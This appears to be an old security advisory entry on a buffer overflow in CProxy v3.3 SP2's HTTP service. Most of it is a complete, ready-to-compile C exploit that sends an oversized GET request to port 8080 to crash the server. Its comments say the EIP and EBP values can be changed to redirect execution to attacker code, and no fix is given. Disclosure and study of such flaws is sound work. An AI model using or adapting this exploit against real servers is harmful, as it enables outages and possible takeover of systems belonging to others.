COMMAND

    CProxy

SYSTEMS AFFECTED

    CProxy v3.3 SP 2

PROBLEM

    "|[TDP]|" found  following.   He found  a vulnerability  in CProxy
    while he was testing it to install in a host server in one office.
    Here is the test that demonstrate the existence of the bug.

    /*
     * Remote Denial of Service for CProxy v3.3 - Service Pack 2
     *
     * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
     *
     *
     * This program xploits an overflow vulnerability in CProxy 3.3 SP2
     * HTTP Service (8080), causing server shutdown
     *
     * Greetings to all the other members and all my friends :)
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    
    #define BUFFERSIZE 247
    #define NOP 0x90
    // If you change this values you can change EIP and EBP values
    // to redirect to a code that you want >;)
    #define EIP 0x61616161
    #define EBP 0x61616161
    
    void usage(char *progname) {
     fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
     exit(1);
    }
    
    int main(int argc, char **argv) {
    char *ptr,buffer[BUFFERSIZE], remotedos[1024];
    unsigned long *long_ptr,eip=EIP, ebp=EBP;
    int aux,sock;
    struct sockaddr_in sin;
    unsigned long ip;
    struct hostent *he;
    
     fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
    
     if (argc<2) usage(argv[0]);
    
     if (argc>=3) eip+=atol(argv[2]);
    
     if (argc>=4) ebp+=atol(argv[3]);
    
     ptr=buffer;
     memset(ptr,0,sizeof(buffer));
     memset(ptr,NOP,sizeof(buffer)-8);
     ptr+=sizeof(buffer)-8;
     long_ptr=(unsigned long*)ptr;
     *(long_ptr++) = ebp;
     *(long_ptr++) = eip;
     ptr=(char *)long_ptr;
     *ptr='\0';
    
     bzero(remotedos, sizeof(remotedos));
     snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);
    
     if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
     perror("socket()");
     return -1;
     }
    
     if ((he = gethostbyname(argv[1])) != NULL) {
     ip = *(unsigned long *)he->h_addr;
     } else {
     if ((ip = inet_addr(argv[1])) == NULL) {
      perror("inet_addr()");
      return -1;
     }
     }
    
     sin.sin_family = AF_INET;
     sin.sin_addr.s_addr = ip;
     sin.sin_port = htons(8080);
    
     fprintf(stderr,"\nEngaged...\n");
     if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
     perror("connect()");
     return -1;
     }
    
     if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
     perror("write()");
     return -1;
     }
    
     fprintf(stderr,"Bye Bye baby!...\n\n");
     if (close(sock) < 0) {
     perror("close()");
     return -1;
     }
    
     return(0);
    }

SOLUTION
    
    Nothing yet.